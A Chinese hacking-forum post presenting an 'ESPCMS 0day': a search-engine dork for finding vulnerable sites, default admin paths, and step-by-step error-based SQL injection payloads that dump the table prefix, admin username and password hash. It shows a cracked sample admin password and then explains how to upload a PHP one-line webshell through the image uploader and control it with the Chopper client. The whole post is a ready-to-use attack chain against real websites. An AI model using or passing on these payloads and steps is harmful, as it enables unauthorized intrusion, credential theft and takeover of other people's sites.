ESPCMS通杀0day

百度关键字:
01.inurl:index.php?ac=article&at=read&did=
复制代码默认后台:

www.XXXx.com/
01.adminsoft/index.php
复制代码或者www.XXXx.com/
01.admin
复制代码（这个是我自己测试的时候，找的，上面一个基本上都有）

注入点(爆表前缀):

01.index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select

02.1 from(select count(*),concat((select (select

03.concat(0x7e,0x27,table_name,0x27,0x7e)) from information_schema.tables where

04.table_schema=database() limit 0,1),floor(rand(0)*2))x from

05.information_schema.tables group by x)a)%23
复制代码



爆用户名:


01.index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select

02.1 from(select count(*),concat((select (select

03.concat(0x7e,0x27,username,0x27,0x7e)) from 前缀_admin_member limit

04.0,1),floor(rand(0)*2))x from information_schema.tables group by

05.x)a)%23
复制代码
爆密码：


01.index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select

02.1 from(select count(*),concat((select (select

03.concat(0x7e,0x27,password,0x27,0x7e)) from 前缀_admin_member limit

04.0,1),floor(rand(0)*2))x from information_schema.tables group by

05.x)a)%23
复制代码

=========================================
密码和用户一次性爆：
01.index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select

02.1 from(select count(*),concat((select (select

03.concat(0x7e,0x27,username,0x27,password)) from 前缀_admin_member limit

04.0,1),floor(rand(0)*2))x from information_schema.tables group by

05.x)a)%23
复制代码

用户名：admin 密码： 64039aa42fa57087e880a77a10f10298 （最后面的1数字不是 ，只截止到前32位,破解得 admin_tmtmw）



===============================================
拿shell:
进到后台后，直接点击分类图片===修改==选择文件===直接上传一句话木马



webshell地址 ，如 http://www.XXX.com/
01.upfile/
复制代码20111201023506_245.php

菜刀伺候


PS：
当上传不了php网马时，去系统设置一下，添加图片上传格式 |php 。这样就可以上传一个图片文件头的网马